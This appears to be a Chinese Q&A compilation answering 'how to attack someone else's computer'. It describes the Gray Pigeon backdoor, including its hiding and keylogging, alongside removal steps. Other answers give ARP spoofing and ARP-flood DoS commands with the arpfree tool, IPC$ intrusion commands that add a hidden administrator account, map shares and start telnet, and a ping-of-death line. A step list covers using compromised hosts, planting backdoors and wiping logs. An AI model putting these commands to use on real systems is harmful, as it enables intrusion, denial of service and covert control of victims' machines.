如何攻擊別人的電腦
『壹』 如何入侵別人的電腦
工具:灰鴿子
步驟詳細看下面:
灰鴿子.由葛軍製造於2003年..它的主要功能就是遠程的控制.遠程注冊表遠程桌面遠程CMD 他是利用IE的漏洞上線的. 你可以去申請個FTP空間.來配置. 一般鴿子不免殺的話什麼殺毒都查得到的..
有什麼問題就說吧,.!
灰鴿子是國內一款著名後門。比起前輩冰河、黑洞來,灰鴿子可以說是國內後門的集大成者。其豐富而強大的功能、靈活多變的操作、良好的隱藏性使其他後門都相形見絀。客戶端簡易便捷的操作使剛入門的初學者都能充當黑客。當使用在合法情況下時,灰鴿子是一款優秀的遠程式控制制軟體。但如果拿它做一些非法的事,灰鴿子就成了很強大的黑客工具。這就好比火葯,用在不同的場合,給人類帶來不同的影響。對灰鴿子完整的介紹也許只有灰鴿子作者本人能夠說清楚,在此我們只能進行簡要介紹。
灰鴿子客戶端和服務端都是採用Delphi編寫。黑客利用客戶端程序配置出服務端程序。可配置的信息主要包括上線類型(如等待連接還是主動連接)、主動連接時使用的公網IP(域名)、連接密碼、使用的埠、啟動項名稱、服務名稱,進程隱藏方式,使用的殼,代理,圖標等等。
服務端對客戶端連接方式有多種,使得處於各種網路環境的用戶都可能中毒,包括區域網用戶(通過代理上網)、公網用戶和ADSL撥號用戶等。
下面介紹服務端:
配置出來的服務端文件文件名為G_Server.exe(這是默認的,當然也可以改變)。然後黑客利用一切辦法誘騙用戶運行G_Server.exe程序。
G_Server.exe運行後將自己拷貝到Windows目錄下(98/xp下為系統盤的windows目錄,2k/NT下為系統盤的Winnt目錄),然後再從體內釋放G_Server.dll和G_Server_Hook.dll到windows目錄下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三個文件相互配合組成了灰鴿子服務端, G_Server_Hook.dll負責隱藏灰鴿子。通過截獲進程的API調用隱藏灰鴿子的文件、服務的注冊表項,甚至是進程中的模塊名。截獲的函數主要是用來遍歷文件、遍歷注冊表項和遍歷進程模塊的一些函數。所以,有些時候用戶感覺種了毒,但仔細檢查卻又發現不了什麼異常。有些灰鴿子會多釋放出一個名為G_ServerKey.dll的文件用來記錄鍵盤操作。注意,G_Server.exe這個名稱並不固定,它是可以定製的,比如當定製服務端文件名為A.exe時,生成的文件就是A.exe、A.dll和A_Hook.dll。
Windows目錄下的G_Server.exe文件將自己注冊成服務(9X系統寫注冊表啟動項),每次開機都能自動運行,運行後啟動G_Server.dll和G_Server_Hook.dll並自動退出。G_Server.dll文件實現後門功能,與控制端客戶端進行通信;G_Server_Hook.dll則通過攔截API調用來隱藏病毒。因此,中毒後,我們看不到病毒文件,也看不到病毒注冊的服務項。隨著灰鴿子服務端文件的設置不同,G_Server_Hook.dll有時候附在Explorer.exe的進程空間中,有時候則是附在所有進程中。
灰鴿子的作者對於如何逃過殺毒軟體的查殺花了很大力氣。由於一些API函數被截獲,正常模式下難以遍歷到灰鴿子的文件和模塊,造成查殺上的困難。要卸載灰鴿子動態庫而且保證系統進程不崩潰也很麻煩,因此造成了近期灰鴿子在互聯網上泛濫的局面。
二、灰鴿子的手工檢測
由於灰鴿子攔截了API調用,在正常模式下服務端程序文件和它注冊的服務項均被隱藏,也就是說你即使設置了「顯示所有隱藏文件」也看不到它們。此外,灰鴿子服務端的文件名也是可以自定義的,這都給手工檢測帶來了一定的困難。
但是,通過仔細觀察我們發現,對於灰鴿子的檢測仍然是有規律可循的。從上面的運行原理分析可以看出,無論自定義的伺服器端文件名是什麼,一般都會在操作系統的安裝目錄下生成一個以「_hook.dll」結尾的文件。通過這一點,我們可以較為准確手工檢測出灰鴿子 服務端。
由於正常模式下灰鴿子會隱藏自身,因此檢測灰鴿子的操作一定要在安全模式下進行。進入安全模式的方法是:啟動計算機,在系統進入Windows啟動畫面前,按下F8鍵(或者在啟動計算機時按住Ctrl鍵不放),在出現的啟動選項菜單中,選擇「Safe Mode」或「安全模式」。
1、由於灰鴿子的文件本身具有隱藏屬性,因此要設置Windows顯示所有文件。打開「我的電腦」,選擇菜單「工具」—》「文件夾選項」,點擊「查看」,取消「隱藏受保護的操作系統文件」前的對勾,並在「隱藏文件和文件夾」項中選擇「 顯示所有文件和文件夾」,然後點擊「確定」。
2、打開Windows的「搜索文件」,文件名稱輸入「_hook.dll」,搜索位置選擇Windows的安裝目錄(默認98/xp為C:\windows,2k/NT為C:\Winnt)。
3、經過搜索,我們在Windows目錄(不包含子目錄)下發現了一個名為Game_Hook.dll的文件。
4、根據灰鴿子原理分析我們知道,如果Game_Hook.DLL是灰鴿子的文件,則在操作系統安裝目錄下還會有Game.exe和Game.dll文件。打開Windows目錄,果然有這兩個文件,同時還有一個用於記錄鍵盤操作的GameKey.dll文件。
經過這幾步操作我們基本就可以確定這些文件是灰鴿子 服務端了,下面就可以進行手動清除。
三、灰鴿子的手工清除
經過上面的分析,清除灰鴿子就很容易了。清除灰鴿子仍然要在安全模式下操作,主要有兩步:
1、清除灰鴿子的服務;
2、刪除灰鴿子程序文件。
注意:為防止誤操作,清除前一定要做好備份。
(一)、清除灰鴿子的服務
注意清除灰鴿子的服務一定要在注冊表裡完成,對注冊表不熟悉的網友請找熟悉的人幫忙操作,清除灰鴿子的服務一定要先備份注冊表,或者到純DOS下將注冊表文件更名,然後在去注冊表刪除灰鴿子的服務。因為病毒會和EXE文件進行關聯
2000/XP系統:
1、打開注冊表編輯器(點擊「開始」-》「運行」,輸入「Regedit.exe」,確定。),打開 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注冊表項。
2、點擊菜單「編輯」-》「查找」,「查找目標」輸入「game.exe」,點擊確定,我們就可以找到灰鴿子的服務項(此例為Game_Server,每個人這個服務項名稱是不同的)。
3、刪除整個Game_Server項。
98/me系統:
在9X下,灰鴿子啟動項只有一個,因此清除更為簡單。運行注冊表編輯器,打開HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run項,我們立即看到名為Game.exe的一項,將Game.exe項刪除即可。
(二)、刪除灰鴿子程序文件
刪除灰鴿子程序文件非常簡單,只需要在安全模式下刪除Windows目錄下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件,然後重新啟動計算機。至此,灰鴿子VIP 2005 服務端已經被清除干凈。
以上介紹的方法適用於我們看到的大部分灰鴿子木馬及其變種,然而仍有極少數變種採用此種方法無法檢測和清除。同時,隨著灰鴿子新版本的不斷推出,作者可能會加入一些新的隱藏方法、防刪除手段,手工檢測和清除它的難度也會越來越大。
四、防止中灰鴿子病毒需要注意的事項
1. 給系統安裝補丁程序。通過Windows Update安裝好系統補丁程序(關鍵更新、安全更新和Service pack),其中MS04-011、MS04-012、MS04-013、MS03-001、MS03-007、MS03-049、MS04-032等都被病毒廣泛利用,是非常必要的補丁程序
2. 給系統管理員帳戶設置足夠復雜足夠強壯的密碼,最好能是10位以上,字母+數字+其它符號的組合;也可以禁用/刪除一些不使用的帳戶
3. 經常更新殺毒軟體(病毒庫),設置允許的可設置為每天定時自動更新。安裝並合理使用網路防火牆軟體,網路防火牆在防病毒過程中也可以起到至關重要的作用,能有效地阻擋自來網路的攻擊和病毒的入侵。部分盜版Windows用戶不能正常安裝補丁,這點也比較無奈,這部分用戶不妨通過使用網路防火牆來進行一定防護
4. 關閉一些不需要的服務,條件允許的可關閉沒有必要的共享,也包括C$、D$等管理共享。完全單機的用戶可直接關閉Server服務。
. 下載HijackThis掃描系統
四、灰鴿子的下載地址
http://www.skycn.com/soft/15753.html zww3008漢化版
http://www.merijn.org/files/hijackthis.zip 英文版
2. 從HijackThis日誌的 O23項可以發現灰鴿子自的服務項
如最近流行的:
O23 - Service: SYSTEM$ (SYSTEM$Server) - Unknown owner - C:\WINDOWS\setemy.bat
O23 - Service: Network Connections Manager (NetConMan) - Unknown owner - C:\WINDOWS\uinstall.exe
O23 - Service: winServer - Unknown owner - C:\WINDOWS\winserver.exe
O23 - Service: Gray_Pigeon_Server (GrayPigeonServer) - Unknown owner - C:\WINDOWS\G_Server.exe
用HijackThis選中上面的O23項,然後選擇"修復該項"或"Fix checked"
3. 用Killbox刪除灰鴿子對應的木馬文件 可以從這里下載Killbox
「灰鴿子」殺傷力是「熊貓燒香」10倍
與「熊貓燒香」病毒的「張揚」不同,「灰鴿子」更像一個隱形的賊,潛伏在用戶「家」中,監視用戶的一舉一動,甚至用戶與MSN、QQ好友聊天的每一句話都難逃「鴿」眼。專家稱,「熊貓燒香」還停留在對電腦自身的破壞,而「灰鴿子」已經發展到對「人」的控制,而被控者卻毫不知情。從某種意義上講,「灰鴿子」的危害超出「熊貓燒香」10倍。
「灰鴿子」如何控制電腦牟利
「黑客培訓班」教網民通過「灰鴿子」控制別人電腦,「學費」最高200元,最低需要50元,學時一周到一個月不等。
黑客通過程序控制他人電腦後,將「肉雞」倒賣給廣告商,「肉雞」的價格在1角到1元不等。資深販子一個月內可以販賣10萬個「肉雞」。
被控制電腦被隨意投放廣告,或者乾脆控制電腦點擊某網站廣告,一舉一動都能被監視。
http://yncnc.onlinedown.net/soft/37257.htm
直接把文件的路徑復制到 Killbox里刪除
通常都是下面這樣的文件 "服務名"具體通過HijackThis判斷
C:\windows\服務名.dll
C:\windows\服務名.exe
C:\windows\服務名.bat
C:\windows\服務名key.dll
C:\windows\服務名_hook.dll
C:\windows\服務名_hook2.dll
舉例說明:
C:\WINDOWS\setemykey.dll
C:\WINDOWS\setemy.dll
C:\WINDOWS\setemy.exe
C:\WINDOWS\setemy_hook.dll
C:\WINDOWS\setemy_hook2.dll
用Killbox刪除那些木馬文件,由於文件具有隱藏屬性,可能無法直接看到,但Killbox能直接刪除. 上面的文件不一定全部存在,如果Killbox提示文件不存在或已經刪除就沒關系了
以上他們做了命名規則解釋 去下載一個木馬殺客灰鴿子專殺 下載地址 http://down911.com/SoftView/SoftView_3014.html 瑞星版本的專殺 下載地址 http://down911.com/SoftView/SoftView_3668.html 清理完後 需要重新啟動計算機 服務停止 然後去找那些殘留文件 參見 上面回答者
軟體名稱: 灰鴿子(Huigezi、Gpigeon)專用檢測清除工具
界面語言: 簡體中文
軟體類型: 國產軟體
運行環境: /Win9X/Me/WinNT/2000/XP/2003
授權方式: 免費軟體
軟體大小: 414KB
軟體簡介: 由灰鴿子工作室開發的,針對灰鴿子專用清除器!可以清除VIP2005版灰鴿子服務端程序(包括殺毒軟體殺不到的灰鴿子服務端)和灰鴿子 [輻射正式版] 和 DLL版服務端 牽手版服務端
運行DelHgzvip2005Server.exe文件清除VIP2005版灰鴿子服務端程序,運行un_hgzserver.exe文件清除灰鴿子 [輻射正式版] 和 DLL版服務端 牽手版服務
五、灰鴿子的公告聲明
灰鴿子工作室於2003年初成立,定位於遠程式控制制、遠程管理、遠程監控軟體開發,主要產品為灰鴿子遠程式控制制系列軟體產品。灰鴿子工作室的軟體產品,均為商業化的遠程式控制制軟體,主要提供給網吧、企業及個人用戶進行電腦軟體管理使用;灰鴿子軟體已獲得國家頒布的計算機軟體著作權登記證書,受著作權法保護。
然而,我們痛心的看到,目前互聯網上出現了利用灰鴿子遠程管理軟體以及惡意破解和篡改灰鴿子遠程管理軟體為工具的不法行為,這些行為嚴重影響了灰鴿子遠程管理軟體的聲譽,同時也擾亂了網路秩序。這完全違背了灰鴿子工作室的宗旨和開發灰鴿子遠程管理軟體的初衷。在此我們呼籲、勸告那些利用遠程式控制制技術進行非法行為的不法分子應立即停止此類非法活動。
應該表明的是,灰鴿子工作室自成立以來恪守國家法律和有關網路管理的規定,具有高度的社會責任感。為有效制止不法分子非法利用灰鴿子遠程管理軟體從事危害社會的非法活動,在此,我們鄭重聲明,自即日起決定全面停止對灰鴿子遠程管理軟體的開發、更新和注冊,以實際行動和堅定的態度來抵制這種非法利用灰鴿子遠程管理軟體的不法行為,並誠懇接受廣大網民的監督。
灰鴿子工作室譴責那些非法利用遠程式控制制技術實現非法目的的行為,對於此類行為,灰鴿子工作室發布了灰鴿子服務端卸載程序,以便於廣大網民方便卸載那些被非法安裝於自己計算機的灰鴿子服務端。卸載程序下載頁面。
六、灰鴿子工作室
灰鴿子工作室於2003年 初成立,定位於遠程式控制制,遠程管理,遠程監控軟體開發,主要產品為灰鴿子遠程式控制制系列,2005年6月,正式推出使用驅動技術捕獲屏幕的遠程式控制制軟體,捕獲屏幕速度開始超越國外遠程式控制制軟體,灰鴿子開始被喻為遠程式控制制的代名詞。我們希望,用我們的技術和經驗,打造出最好的遠程式控制制軟體,推動遠程式控制制技術的發展!
2007年3月21日
http://www.huigezi.net/uninstall/
卸載頁面
七、灰鴿子官方網站
http;//www.huigezi.net
八、 灰鴿子工作室成員介紹
葛軍:2003年初,與好友黃土平創建了灰鴿子工作室。2001年挺進版率先在遠程式控制制軟體上開發和使用了反彈連接技術。
黃土平:2003年初,與好友葛軍創建了灰鴿子工作室。
灰鴿子是同類軟體的祖先
參考資料:`
『貳』 如何攻擊別人的電腦
教你讓內網任何一台電腦死機 的程序:(最好別犯法,否則子自食其果!)
開始忘記說了,要使用ARP欺騙,必須啟動ip路由功能,修改(添加)注冊表選項:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1
(有的朋友發現打開網卡失敗,原因可能就是這個.)
發送的時候可以選擇ARP的TYPE。如果是ARP請求報文,則只要輸入要問的IP地址
如果是ARP應答報文則要輸入發送端的IP以及對方詢問MAC地址對應的IP地址
最後的發送速度可選參數為:(大小寫敏感..我覺得挺不好的)
fast----------最快
hear---------每60MS一個包(可能是比較適合結合SNIFFER做監聽)
slowhear---每500MS一個包
auto---------每1秒一個包
slow---------每2秒個包
使用方法如下:
***********************************************************************
* (1)Send arp packet in "request mode" Examples:
* arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast
* | | | | |
* your mac address | | | |
* destnation mac | | speed
* arp type |
* |
* your ip address
***********************************************************************
* (2)Send arp packet in "reply mode" Examples:
* arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto
* | | | | | |
* your mac address | | | | |
* destnation mac | | | speed
* arp type | |
* | |
* your ip address |
* |
* the ip address of destnation mac
***********************************************************************
補充:反擊「LAN終結者」的辦法:
反擊「終結者」有幾個辦法:
1:發動比他更強烈的攻擊:
arpfree 123412341234 ffffffffffff request 192.168.237.58 fast
|
|
這里是你想攻擊的人的IP地址
2:交換機競爭:
arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
|
|
這里是你想攻擊的人的MAC地址
1:情況將導致他IP地址沖突(比「終結者」來的猛烈多了)
2:情況將使得他無法連接網路(由於交換機把他的流量都給你了)
———————————更-----新----消-----息—————————————————————
因為有朋友反映在非交換環境下,如使用HUB的情況下,無法對目標進行打擊
故於2006年4月5日更新附件「arpfree.rar」
增加參數「bomb」,使用方法如下:
假設,目標為IP:192.168.237.109 目標mac為:011a8575a436
攻擊命令如下:
arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb
其實就是進行簡單的ARP DOS攻擊,快速刷新目標的ARP緩存,可以在消耗自身較少系統資源的情況下
造成和PDOS工具類似的效果,並且如果你不停止攻擊,對方重啟以後也無法正常進入系統
(當然前提是他沒拔網線)。
其實這樣做是十分不厚道的....所以參數就沒有寫在程序的 HELP 裡面,大家慎用...
『叄』 怎樣攻擊別人的計算機
dos命令之net,教你怎麼攻擊別人電腦。
通過掃描21埠或3389埠就可以入侵
一般黑客入侵所需要的幾個常用命令
1:NET
只要你擁有某IP的用戶名和密碼,那就用IPC$做連接吧!
這里我們假如你得到的用戶是hbx,密碼是123456。假設對方IP為127.0.0.1
net use \\127.0.0.1\ipc$ "123456" /user:"hbx"
退出的命令是
net use \\127.0.0.1\ipc$ /delte
下面的操作你必須登陸後才可以用.登陸的方法就在上面.
----------------------
下面我們講怎麼創建一個用戶,由於SA的許可權相當於系統的超級用戶.
我們加一個hei的用戶密碼為lovechina
net user hei lovechina /add
只要顯示命令成功,那麼我們可以把他加入Administrator組了.
net localgroup Administrators hei /add
----------------------
這里是講映射對方的C盤,當然其他盤也可以,只要存在就行了.我們這里把對方的C盤映射到本地的Z盤.
net use z:\\127.0.0.1\c$
----------------------
net start telnet
這樣可以打開對方的TELNET服務.
----------------------
這里是將Guest用戶激活,guest是NT的默認用戶,而且無法刪除呢?不知道是否這樣,我的2000就是刪除不了它。
net user guest /active:yes
----------------------
這里是把一個用戶的密碼改掉,我們把guest的密碼改為lovechina,其他用戶也可以的。只要有許可權就行了呀!
net user guest lovechina
net命令果然強大啊!
——————————————————————————————————
net use ipipc$ " " /user:" " 建立IPC空鏈接
net use ipipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: ipc$ "密碼" /user:"用戶名" 直接登陸後映射對方C:到本地為H:
net use h: ipc$ 登陸後映射對方C:到本地為H:
net use ipipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名密碼/add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意:administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schele)
net stop 服務名 停止某服務
net time 目標ip 查看對方時間
net time 目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況,常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據,參數:「-l[空格]數據包大小」;「-n發送數據次數」;「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
『肆』 如何利用網路攻擊別人電腦
告訴你當黑客
1、
隱藏自已的位置 為了不在目的主機上留下自己的IP地址,防止被目的主機發現,老練的攻擊者都會盡 量通過「跳板」或「肉雞」展開攻擊。所謂「肉雞」通常是指,HACK實現通過後門程序控制 的傀儡主機,通過「肉雞」開展的掃描及攻擊,即便被發現也由於現場遺留環境的IP地址是 「肉雞」的地址而很難追查。
2、
尋找目標主機並分析目標主機 攻擊者首先要尋找目標主機並分析目標主機。在Internet上能真正標識主機的是IP地 址,域名是為了便於記憶主機的IP地址而另起的名字,只要利用域名和IP地址就可以順利地 找到目標主機。當然,知道了要攻擊目標的位置還是遠遠不夠的,還必須將主機的操作系統 類型及其所提供服務等資料作個全面的了解。此時,攻擊者們會使用一些掃描器工具,以試 圖獲取目標主機運行的是哪種操作系統的哪個版本,系統有哪些帳戶,開啟了哪些服務,以 及服務程序的版本等資料,為入侵作好充分的准備。
3、
獲取帳號和密碼,登錄主機 攻擊者要想入侵一台主機,首先要有該主機的一個帳號和密碼,否則連登錄都無法進 行。這樣常迫使他們先設法盜竊帳戶文件,進行破解,從中獲取某用戶的帳戶和口令,再尋 覓合適時機以此身份進入主機。當然,利用某些工具或系統漏洞登錄主機也是攻擊者常用的 一種技法。
4、
獲得控制權 攻擊者們利用各種工具或系統漏洞進入目標主機系統獲得控制權之後,就會做兩件事 :清除記錄和留下後門。他會更改某些系統設置、在系統中置入特洛伊木馬或其他一些遠程 操縱程序,以便日後可以不被覺察地再次進入系統。此外,為了避免目標主機發現,清除日 志、刪除拷貝的文件等手段來隱藏自己的蹤跡之後,攻擊者就開始下一步的行動。
『伍』 怎樣入侵別人的電腦和入侵的步驟
入侵別人的?
你可以去做黑客了,但是你肯定是菜鳥級別的,
去入侵別人,就會被別人察覺的,還是你要是遇到高手的話,你就完蛋了,等著讓電腦報廢吧~~
還有,網路上都有網路警察的,遇到他們,你就等著去看守所吧
『陸』 怎麼通過IP攻擊別人的電腦
DDOS或DOS,分布式淹沒,可以讓對方電腦癱瘓.但比較復雜,跟你講也講不清除,看你提問的語言就知道還是沒什麼電腦常識的~~~~所以嘛,你還是先去看看有關網路信息安全的資料吧~~~
漏洞這東西是微軟的事情,除非你是伺服器,我敢肯定沒人那麼無聊的攻擊你的,WINDOWS系列的漏洞多了去了,微軟說目前人們知道的WINDOWS漏洞還不到他們所知道的%5,想想吧,漏洞這東西還是交給防火牆或殺毒軟體吧
『柒』 怎麼攻擊別人電腦
這又何苦這樣
提起黑客,總是那麼神秘莫測。在人們眼中,黑客是一群聰明絕頂,精力旺盛的年輕人,一門心思地破譯各種密碼,以便偷偷地、未經允許地打入政府、企業或他人的計算機系統,窺視他人的隱私。那麼,什麼是黑客呢?
黑客(hacker),源於英語動詞hack,意為「劈,砍」,引申為「幹了一件非常漂亮的工作」。在早期麻省理工學院的校園俚語中,「黑客」則有「惡作劇」之意,尤指手法巧妙、技術高明的惡作劇。在日本《新黑客詞典》中,對黑客的定義是「喜歡探索軟體程序奧秘,並從中增長了其個人才乾的人。他們不象絕大多數電腦使用者那樣,只規規矩矩地了解別人指定了解的狹小部分知識。」由這些定義中,我們還看不出太貶義的意味。他們通常具有硬體和軟體的高級知識,並有能力通過創新的方法剖析系統。「黑客」能使更多的網路趨於完善和安全,他們以保護網路為目的,而以不正當侵入為手段找出網路漏洞。
另一種入侵者是那些利用網路漏洞破壞網路的人。他們往往做一些重復的工作(如用暴力法破解口令),他們也具備廣泛的電腦知識,但與黑客不同的是他們以破壞為目的。這些群體成為「駭客」。當然還有一種人兼於黑客與入侵者之間。
一般認為,黑客起源於50年代麻省理工學院的實驗室中,他們精力充沛,熱衷於解決難題。60、70年代,「黑客」一詞極富褒義,用於指代那些獨立思考、奉公守法的計算機迷,他們智力超群,對電腦全身心投入,從事黑客活動意味著對計算機的最大潛力進行智力上的自由探索,為電腦技術的發展做出了巨大貢獻。正是這些黑客,倡導了一場個人計算機革命,倡導了現行的計算機開放式體系結構,打破了以往計算機技術只掌握在少數人手裡的局面,開了個人計算機的先河,提出了「計算機為人民所用」的觀點,他們是電腦發展史上的英雄。現在黑客使用的侵入計算機系統的基本技巧,例如破解口令(password cracking),開天窗(trapdoor),走後門(backdoor),安放特洛伊木馬(Trojan horse)等,都是在這一時期發明的。從事黑客活動的經歷,成為後來許多計算機業巨子簡歷上不可或缺的一部分。例如,蘋果公司創始人之一喬布斯就是一個典型的例子。
在60年代,計算機的使用還遠未普及,還沒有多少存儲重要信息的資料庫,也談不上黑客對數據的非法拷貝等問題。到了80、90年代,計算機越來越重要,大型資料庫也越來越多,同時,信息越來越集中在少數人的手裡。這樣一場新時期的「圈地運動」引起了黑客們的極大反感。黑客認為,信息應共享而不應被少數人所壟斷,於是將注意力轉移到涉及各種機密的信息資料庫上。而這時,電腦化空間已私有化,成為個人擁有的財產,社會不能再對黑客行為放任不管,而必須採取行動,利用法律等手段來進行控制。黑客活動受到了空前的打擊。
但是,政府和公司的管理者現在越來越多地要求黑客傳授給他們有關電腦安全的知識。許多公司和政府機構已經邀請黑客為他們檢驗系統的安全性,甚至還請他們設計新的保安規程。在兩名黑客連續發現網景公司設計的信用卡購物程序的缺陷並向商界發出公告之後,網景修正了缺陷並宣布舉辦名為「網景缺陷大獎賽」的競賽,那些發現和找到該公司產品中安全漏洞的黑客可獲1000美元獎金。無疑黑客正在對電腦防護技術的發展作出貢獻。
2,黑客攻擊
一些黑客往往回採取一些幾種方法,但是我很想說的是,一個優秀的黑客絕不會隨便攻擊別人的。
1)、獲取口令
這又有三種方法:一是通過網路監聽非法得到用戶口令,這類方法有一定的局限性,但危害性極大,監聽者往往能夠獲得其所在網段的所有用戶賬號和口令,對區域網安全威脅巨大;二是在知道用戶的賬號後(如電子郵件@前面的部分)利用一些專門軟體強行破解用戶口令,這種方法不受網段限制,但黑客要有足夠的耐心和時間;三是在獲得一個伺服器上的用戶口令文件(此文件成為Shadow文件)後,用暴力破解程序破解用戶口令,該方法的使用前提是黑客獲得口令的Shadow文件。此方法在所有方法中危害最大,因為它不需要像第二種方法那樣一遍又一遍地嘗試登錄伺服器,而是在本地將加密後的口令與Shadow文件中的口令相比較就能非常容易地破獲用戶密碼,尤其對那些弱智用戶(指口令安全系數極低的用戶,如某用戶賬號為zys,其口令就是zys666、666666、或乾脆就是zys等)更是在短短的一兩分鍾內,甚至幾十秒內就可以將其幹掉。
2)、放置特洛伊木馬程序
特洛伊木馬程序可以直接侵入用戶的電腦並進行破壞,它常被偽裝成工具程序或者游戲等誘使用戶打開帶有特洛伊木馬程序的郵件附件或從網上直接下載,一旦用戶打開了這些郵件的附件或者執行了這些程序之後,它們就會象古特洛伊人在敵人城外留下的藏滿士兵的木馬一樣留在自己的電腦中,並在自己的計算機系統中隱藏一個可以在windows啟動時悄悄執行的程序。當您連接到網際網路上時,這個程序就會通知黑客,來報告您的IP地址以及預先設定的埠。黑客在收到這些信息後,再利用這個潛伏在其中的程序,就可以任意地修改您的計算機的參數設定、復制文件、窺視你整個硬碟中的內容等,從而達到控制你的計算機的目的。
3)、WWW的欺騙技術
在網上用戶可以利用IE等瀏覽器進行各種各樣的WEB站點的訪問,如閱讀新聞組、咨詢產品價格、訂閱報紙、電子商務等。然而一般的用戶恐怕不會想到有這些問題存在:正在訪問的網頁已經被黑客篡改過,網頁上的信息是虛假的!例如黑客將用戶要瀏覽的網頁的URL改寫為指向黑客自己的伺服器,當用戶瀏覽目標網頁的時候,實際上是向黑客伺服器發出請求,那麼黑客就可以達到欺騙的目的了。
4)、電子郵件攻擊
電子郵件攻擊主要表現為兩種方式:一是電子郵件轟炸和電子郵件「滾雪球」,也就是通常所說的郵件炸彈,指的是用偽造的IP地址和電子郵件地址向同一信箱發送數以千計、萬計甚至無窮多次的內容相同的垃圾郵件,致使受害人郵箱被「炸」,嚴重者可能會給電子郵件伺服器操作系統帶來危險,甚至癱瘓;二是電子郵件欺騙,攻擊者佯稱自己為系統管理員(郵件地址和系統管理員完全相同),給用戶發送郵件要求用戶修改口令(口令可能為指定字元串)或在貌似正常的附件中載入病毒或其他木馬程序(據筆者所知,某些單位的網路管理員有定期給用戶免費發送防火牆升級程序的義務,這為黑客成功地利用該方法提供了可乘之機),這類欺騙只要用戶提高警惕,一般危害性不是太大。
5)、通過一個節點來攻擊其他節點
黑客在突破一台主機後,往往以此主機作為根據地,攻擊其他主機(以隱蔽其入侵路徑,避免留下蛛絲馬跡)。他們可以使用網路監聽方法,嘗試攻破同一網路內的其他主機;也可以通過IP欺騙和主機信任關系,攻擊其他主機。這類攻擊很狡猾,但由於某些技術很難掌握,如IP欺騙,因此較少被黑客使用。
6)、網路監聽
網路監聽是主機的一種工作模式,在這種模式下,主機可以接受到本網段在同一條物理通道上傳輸的所有信息,而不管這些信息的發送方和接受方是誰。此時,如果兩台主機進行通信的信息沒有加密,只要使用某些網路監聽工具,例如NetXray for windows 95/98/nt,sniffit for linux 、solaries等就可以輕而易舉地截取包括口令和帳號在內的信息資料。雖然網路監聽獲得的用戶帳號和口令具有一定的局限性,但監聽者往往能夠獲得其所在網段的所有用戶帳號及口令。
7)、尋找系統漏洞
許多系統都有這樣那樣的安全漏洞(Bugs),其中某些是操作系統或應用軟體本身具有的,如Sendmail漏洞,win98中的共享目錄密碼驗證漏洞和IE5漏洞等,這些漏洞在補丁未被開發出來之前一般很難防禦黑客的破壞,除非你將網線拔掉;還有一些漏洞是由於系統管理員配置錯誤引起的,如在網路文件系統中,將目錄和文件以可寫的方式調出,將未加Shadow的用戶密碼文件以明碼方式存放在某一目錄下,這都會給黑客帶來可乘之機,應及時加以修正。
8)、利用帳號進行攻擊
有的黑客會利用操作系統提供的預設賬戶和密碼進行攻擊,例如許多UNIX主機都有FTP和Guest等預設賬戶(其密碼和賬戶名同名),有的甚至沒有口令。黑客用Unix操作系統提供的命令如Finger和Ruser等收集信息,不斷提高自己的攻擊能力。這類攻擊只要系統管理員提高警惕,將系統提供的預設賬戶關掉或提醒無口令用戶增加口令一般都能克服。
9)、偷取特權
利用各種特洛伊木馬程序、後門程序和黑客自己編寫的導致緩沖區溢出的程序進行攻擊,前者可使黑客非法獲得對用戶機器的完全控制權,後者可使黑客獲得超級用戶的許可權,從而擁有對整個網路的絕對控制權。這種攻擊手段,一旦奏效,危害性極大。
『捌』 黑客是怎麼入侵別人電腦的
1、通過埠入侵
